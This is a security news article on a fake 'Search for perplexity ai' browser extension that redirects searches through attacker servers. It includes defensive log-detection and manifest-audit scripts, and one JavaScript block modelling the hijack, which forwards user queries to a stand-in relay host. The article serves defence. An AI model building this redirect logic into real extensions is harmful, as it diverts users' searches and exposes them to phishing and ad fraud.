Microsoft Threat Intelligence issued a critical alert on June 29, 2026, after uncovering a rogue Chromium-based browser extension actively hijacking search traffic on Windows machines. Dubbed “Search for perplexity ai,” the extension impersonates the legitimate AI-powered search platform Perplexity AI, tricking users into installing what appears to be a helpful research tool. Instead, it secretly reroutes search queries through attacker-controlled servers, exposing victims to phishing scams, data theft, and a flood of intrusive advertisements. The discovery underscores the accelerating danger of AI-themed malware as cybercriminals capitalize on the brand recognition of rapidly growing AI services.

A Wolf in AI Clothing: How the Extension Operates

The extension exploits the familiar name and iconography of Perplexity AI to appear authentic in browser extension stores. Once installed, it requests excessively broad permissions: access to web page content, access to browser tabs, and the ability to change search settings, including the default search provider. Most users click through this prompt without a second look. With these privileges, the extension intercepts every search query entered in the omnibox and redirects it through a chain of intermediary pages. The final destination is often a counterfeit search engine that injects affiliate links, displays aggressive pop-ups, or captures sensitive information such as login credentials and browsing habits. In some observed cases, the extension injects JavaScript into legitimate result pages to replace sponsored links with attacker-controlled ads, silently siphoning revenue from both users and advertisers.

Why Windows Users Are the Prime Target

While the extension is built for any Chromium-based browser, its primary impact lands on Windows systems, which dominate global desktop market share. Microsoft Edge and Google Chrome, both running the Chromium engine, account for the vast majority of browser usage on Windows, making them a lucrative attack surface. The malware's focus on search redirection is especially effective on Windows, where the default search provider is often left untouched and users readily accept extensions that promise enhanced functionality. Microsoft's security team noted that the extension was being served through unofficial marketplaces in addition to some approved listings, likely employing techniques such as "version flood" updates that add malicious code after passing initial review.

Microsoft’s Rapid Response

Within hours of detection, Microsoft Threat Intelligence integrated protections into Microsoft Defender Antivirus and Microsoft Edge. Users running an up-to-date Defender will see the extension flagged as PUA:Win32/SearchHijacker or a similar designation, and the browser-based SmartScreen filter now blocks the extension’s download domains. For enterprise environments, administrators can find detailed indicators of compromise (IOCs) in the Microsoft 365 Defender portal, including the extension’s unique identifier (ID), installation URLs, and command-and-control server IPs. Microsoft stresses that the threat remains active, and additional variants may surface as the attackers iterate on their social engineering tactics.

The Technical Underpinnings: A Dissected Redirect Scheme

Analysis of the extension's source code reveals a straightforward but effective redirect infrastructure. A background script loads obfuscated configuration data from a remote server, allowing the attackers to update redirect targets without modifying the extension itself. When a user performs a search on Google, Bing, or from the address bar, the extension checks the URL against a list of known search engine domains. If a match is found, it rewrites the request to pass the query to an intermediary server, which then forwards it to a final landing page filled with ads. All the while, the user sees what appears to be a normal search results page, often with a custom skin mimicking the original search engine's design.
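The redirect decision described above, as an added example that models the scheme; it is not the extension's own code, which this page does not reproduce. The engine list, the relay host (`relay.example`) and the parameter names are assumptions, and the block runs under Node.js, which provides the global `URL` class.

```javascript
// Added example (not the extension's code): a model of the search-redirect
// logic described in the article. Engine list, relay host and parameter
// names are assumptions. Runs under Node.js, which provides the global URL class.

// Config as the attackers' server would serve it. Changing this object on the
// server changes where queries go without shipping a new extension version.
const REMOTE_CONFIG = {
  relay: "https://relay.example/r",                 // intermediary server (assumed)
  engines: {
    "www.google.com": { path: "/search", param: "q" },
    "www.bing.com":   { path: "/search", param: "q" },
    "duckduckgo.com": { path: "/",       param: "q" },
  },
};

// Return { engine, query } when urlString is a query to a listed search
// engine, otherwise null. Hostnames are matched exactly against the list.
function extractSearchQuery(urlString, config) {
  let url;
  try {
    url = new URL(urlString);
  } catch {
    return null;                                    // not a URL at all
  }
  const engine = config.engines[url.hostname];
  if (!engine || url.pathname !== engine.path) return null;
  const query = url.searchParams.get(engine.param);
  return query ? { engine: url.hostname, query } : null;
}

// Build the rewritten navigation target: the query is forwarded to the relay,
// and the original engine is passed along so the landing page can copy its skin.
function buildRedirect(urlString, config) {
  const hit = extractSearchQuery(urlString, config);
  if (!hit) return null;                            // non-search traffic is left alone
  const target = new URL(config.relay);
  target.searchParams.set("q", hit.query);
  target.searchParams.set("src", hit.engine);
  return target.toString();
}

// Stand-alone demonstration: one hijacked query, one non-search Google URL,
// one unrelated Google property.
for (const u of [
  "https://www.google.com/search?q=perplexity+ai",
  "https://www.google.com/maps?q=coffee",
  "https://mail.google.com/mail/",
]) {
  console.log(u, "->", buildRedirect(u, REMOTE_CONFIG));
}
```

In a Manifest V3 extension the same decision would sit in the background service worker, attached to `chrome.webNavigation.onBeforeNavigate` and acted on with `chrome.tabs.update`, or compiled into `declarativeNetRequest` redirect rules; either way the tab ends up at the relay with the query intact. The point for defenders is that nothing in the packaged extension names the final landing page: it is fetched at runtime from the real-world equivalent of `REMOTE_CONFIG`, which is why static review of the store package finds little.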

Deep dives into the network traffic show that some redirect paths lead to well-known advertising syndicates, while others direct users to phishing portals designed to harvest credentials. The extension also employs cloaking: it serves benign content to IP addresses associated with browser stores' review teams, so the malicious behavior remains hidden during listing approval. This cat-and-mouse game has become a hallmark of browser extension malware, and AI-themed lures add a fresh layer of deception.
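Because the hijack only shows itself in real user traffic, the practical place to catch it is endpoint or proxy logs rather than the store's review sandbox. The following detection logic is an added example, not from Microsoft or from the page; the log format, the hostnames and the three-second pairing window are constructed assumptions. It pairs each search-engine query with any request from the same client, shortly afterwards, to a host outside the known engines that carries the same query text in a parameter, which is exactly the footprint of the query being forwarded to a relay or landing page.

```javascript
// Added example: detect search-query hijack chains in proxy logs.
// Log format, hosts and the pairing window are constructed for this example.
const KNOWN_SEARCH_HOSTS = new Set(["www.google.com", "www.bing.com", "duckduckgo.com"]);
const WINDOW_MS = 3000;   // a hijacking extension redirects within a fraction of a second

// Constructed log lines: "<ISO timestamp> <client-ip> <url>"
const SAMPLE_LOG = `
2026-06-29T10:00:01.000Z 10.1.2.3 https://www.google.com/search?q=quarterly+report
2026-06-29T10:00:01.400Z 10.1.2.3 https://relay.example/r?q=quarterly+report&src=www.google.com
2026-06-29T10:00:02.100Z 10.1.2.3 https://ads-landing.example/s?kw=quarterly%20report
2026-06-29T10:05:00.000Z 10.1.2.9 https://www.bing.com/search?q=vpn+client
2026-06-29T10:05:00.300Z 10.1.2.9 https://www.bing.com/fd/ls/l?IG=abc
2026-06-29T10:09:00.000Z 10.1.2.9 https://www.google.com/search?q=weather
2026-06-29T10:09:10.000Z 10.1.2.9 https://weather.example/?q=weather
`;

// Parse and sort by time so a forward scan can stop at the window edge.
function parseLog(text) {
  return text.trim().split("\n").map(line => {
    const [ts, client, raw] = line.trim().split(/\s+/);
    return { ts: Date.parse(ts), client, url: new URL(raw) };
  }).sort((a, b) => a.ts - b.ts);
}

// Query text of a request to a known search engine, or null.
function searchQueryOf(url) {
  if (!KNOWN_SEARCH_HOSTS.has(url.hostname)) return null;
  return url.searchParams.get("q");
}

// True if any parameter of url carries the query text (case/space-normalized).
function carriesQuery(url, query) {
  const needle = query.trim().toLowerCase();
  for (const value of url.searchParams.values()) {
    if (value.trim().toLowerCase() === needle) return true;
  }
  return false;
}

// For each search request, look at the same client's requests inside WINDOW_MS;
// a non-engine host that receives the identical query text is flagged.
function detectHijacks(entries) {
  const findings = [];
  entries.forEach((e, i) => {
    const query = searchQueryOf(e.url);
    if (!query) return;
    for (let j = i + 1; j < entries.length; j++) {
      const later = entries[j];
      if (later.ts - e.ts > WINDOW_MS) break;          // sorted, so nothing later qualifies
      if (later.client !== e.client) continue;
      if (KNOWN_SEARCH_HOSTS.has(later.url.hostname)) continue;  // the engine's own follow-ups
      if (carriesQuery(later.url, query)) {
        findings.push({
          client: e.client, query,
          from: e.url.hostname, to: later.url.hostname,
          delayMs: later.ts - e.ts,
        });
      }
    }
  });
  return findings;
}

// Stand-alone demonstration over the constructed log.
for (const f of detectHijacks(parseLog(SAMPLE_LOG))) console.log(f);
```

On the sample, the client 10.1.2.3 search is flagged twice (the relay hop and the ad landing page), while 10.1.2.9's Bing telemetry call and the ten-second-later click to a weather site are not. The window is the main false-positive control: a user who types a query and clicks a result that echoes it within three seconds would trip the rule, so a production version should additionally check the navigation type or referrer, and should treat repeated hits from one client as the strong signal.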

Implications for IT Administrators

For Windows IT administrators, this incident is a call to tighten extension policies. Many organizations rely on Group Policy or Microsoft Intune to block all extensions except those explicitly allowlisted. However, phishing emails and drive-by downloads can still trick employees into installing rogue extensions on unmanaged personal devices that sync with corporate accounts. Admins should inspect the list of installed extensions across their fleet using tools like Microsoft Endpoint Manager or third-party inventory solutions. Particular attention should be paid to the extension ID reported by Microsoft: [placeholder—unique extension identifier]. Quick removal steps include navigating to edge://extensions or chrome://extensions, locating the suspicious extension, and clicking “Remove.”
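The fleet inventory step, as an added example: a Node.js triage script of the kind an administrator might run over `manifest.json` files collected from each endpoint's extension directory (for Chrome `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<id>\<version>\manifest.json`, for Edge the same layout under `Microsoft\Edge`). It is not Microsoft's tooling. The extension IDs, the allowlist and the inventory are constructed; the IOC slot is where the ID from Microsoft's advisory would go. Beyond the ID match, it flags the manifest features the article describes: broad page and tab access, a `chrome_settings_overrides.search_provider` entry that replaces the default search engine, and content scripts injected into every site.

```javascript
// Added example: triage collected extension manifests against an allowlist,
// a known-bad ID list and risky manifest features. All IDs are constructed.
const ALLOWLIST = new Set([
  "abcdefghijklmnopabcdefghijklmnop",   // constructed: a corporate-approved extension
]);
const IOC_IDS = new Set([
  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",   // placeholder: the ID published in the advisory
]);
// Permissions that let an extension watch or rewrite navigation and page content.
const RISKY_PERMISSIONS = new Set([
  "tabs", "webRequest", "webRequestBlocking", "declarativeNetRequest",
  "scripting", "webNavigation",
]);
// Host patterns that cover every site.
const ALL_HOSTS = /^(<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;

// Return the list of reasons an installed extension deserves a look (empty = clean).
function riskReasons(ext) {
  const reasons = [];
  const m = ext.manifest;
  if (IOC_IDS.has(ext.id)) reasons.push("known_ioc_id");
  if (!ALLOWLIST.has(ext.id)) reasons.push("not_allowlisted");
  const perms = [...(m.permissions || []), ...(m.host_permissions || [])];
  if (perms.some(p => RISKY_PERMISSIONS.has(p))) reasons.push("broad_permissions");
  if (perms.some(p => ALL_HOSTS.test(p))) reasons.push("all_hosts");
  if (m.chrome_settings_overrides && m.chrome_settings_overrides.search_provider) {
    reasons.push("overrides_search_provider");
  }
  const scripts = m.content_scripts || [];
  if (scripts.some(cs => (cs.matches || []).some(p => ALL_HOSTS.test(p)))) {
    reasons.push("content_script_all_hosts");
  }
  return reasons;
}

// Report only extensions with at least one reason, keeping name and ID for follow-up.
function auditExtensions(installed) {
  return installed
    .map(ext => ({ id: ext.id, name: ext.manifest.name, reasons: riskReasons(ext) }))
    .filter(r => r.reasons.length > 0);
}

// Constructed inventory, shaped like the manifest.json files an agent would collect.
const INSTALLED = [
  { id: "abcdefghijklmnopabcdefghijklmnop",
    manifest: { name: "Approved Docs Tool", manifest_version: 3, permissions: ["storage"] } },
  { id: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
    manifest: {
      name: "Search for perplexity ai", manifest_version: 3,
      permissions: ["tabs", "scripting", "storage"],
      host_permissions: ["<all_urls>"],
      chrome_settings_overrides: {
        search_provider: { name: "Perplexity Search",
                           search_url: "https://relay.example/r?q={searchTerms}", is_default: true },
      },
      content_scripts: [{ matches: ["*://*/*"], js: ["inject.js"] }],
    } },
  { id: "ppppoooonnnnmmmmllllkkkkjjjjiiii",
    manifest: { name: "Some Note Taker", manifest_version: 3, permissions: ["storage", "activeTab"] } },
];

// Stand-alone demonstration.
for (const r of auditExtensions(INSTALLED)) console.log(r.id, r.name, r.reasons.join(","));
```

The clean extension produces no reasons, the unknown note-taker is reported only as not allowlisted, and the fake Perplexity entry trips every check. Detection is the first half; the enforcement counterpart is the `ExtensionInstallAllowlist` and `ExtensionInstallBlocklist` policies that Chrome and Edge both honour via Group Policy or Intune, which is what keeps the entry from coming back after the user clicks Remove.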

Additionally, enabling Attack Surface Reduction (ASR) rules in Microsoft Defender for Endpoint, such as the rule that blocks executables unless they meet prevalence, age, or trusted-list criteria, can stop the droppers and other binaries that often accompany such extensions. Enforcing multi-factor authentication and regular security awareness training further reduces the risk that a hijacked search session leads to compromised corporate accounts.

The Bigger Picture: AI Impersonation as a Growing Threat Vector

The "Search for perplexity ai" extension is far from an isolated incident. As AI tools like Perplexity, ChatGPT, and others gain mainstream traction, attackers are quick to exploit their brand equity. Just weeks before this discovery, similar fake extensions targeted Bing Chat and Google Bard, demonstrating a clear trend. Cybercriminals bank on users' eagerness to adopt the latest AI assistant: users comb official stores for any listing that appears connected and install the first plausible match. In many cases, these extensions also carry data-stealing payloads, siphoning cookies and authentication tokens that can be sold on dark web markets or used for credential stuffing attacks.

This trend highlights a critical weakness in browser extension security models. Despite improvements in review processes, the sheer volume of submissions makes it impossible to catch every malicious actor. Google’s Chrome Web Store and Microsoft’s Edge Add-ons store have both removed the offending extension, but it often reappears under slightly different names and accounts. The anonymous nature of extension development, coupled with the ease of cloning legitimate tools, creates a persistent cat-and-mouse challenge that may require fundamental changes in how browsers handle extensions.

What Users Should Do Right Now

If you suspect the fake Perplexity AI extension has infiltrated your browser, first disconnect from the internet and manually inspect your extensions panel. Look for any entry that references “Perplexity,” especially one named “Search for perplexity ai” or variations. Remove it immediately, then run a full system scan using Windows Defender or a trusted third-party scanner. Clear your browser cache and cookies to eliminate any lingering tracking scripts. Change passwords for accounts accessed during the period the extension was installed, and enable multi-factor authentication wherever possible.

Prevention is equally critical. Before installing any browser extension, scrutinize the developer name, reviews, and permissions. Check how long the developer has been active and whether the extension’s description contains spelling errors or vague language—common hallmarks of counterfeit software. For enterprise users, IT departments should maintain a curated allowlist of approved extensions and deploy security information and event management (SIEM) systems to alert on unauthorized installations.

Microsoft’s Future Mitigation Strategies

Microsoft has signaled that it will leverage artificial intelligence within its own security stack to detect anomalous extension behavior at scale. By analyzing patterns of search redirects, permission requests, and communication with remote servers, machine learning models can flag malicious extensions before they gain significant distribution. The company is also working with browser engine maintainers to propose new extension API limits that would prevent a single extension from intercepting all search traffic without explicit user consent on a per-search basis.

These measures, while promising, take time to implement industry-wide. In the interim, the burden falls on individual users and IT teams to exercise caution. The fusion of AI branding with malware is a potent combination that will only intensify as public fascination with AI continues. Staying ahead requires constant education, robust security tooling, and a healthy dose of skepticism toward browser extensions that seem too good to be true.

Actionable Takeaways

  • Audit browser extensions: Regularly review installed extensions across all profiles. Remove any you don’t recognize or use.
  • Limit permissions: Deny excessive permission requests, especially those asking for access to all website data or the ability to read and change search-related settings.
  • Use enterprise controls: Implement group policies to block unknown extensions and enable Microsoft Defender for Endpoint’s web protection features.
  • Verify developer identity: Install extensions only from well-known developers. For AI tools, always navigate to the official website to find a direct download link rather than searching in app stores.
  • Stay informed: Monitor official channels such as the Microsoft Threat Intelligence blog and the MSRC for updates on emerging threats.

This latest outbreak serves as a stark reminder that the very tools designed to streamline our digital lives can become conduits for cybercrime. As AI continues to reshape the technology landscape, users and organizations alike must remain vigilant, adapting their defenses to an ever-evolving threat landscape that now includes fake extensions cloaked in the branding of our most trusted digital assistants.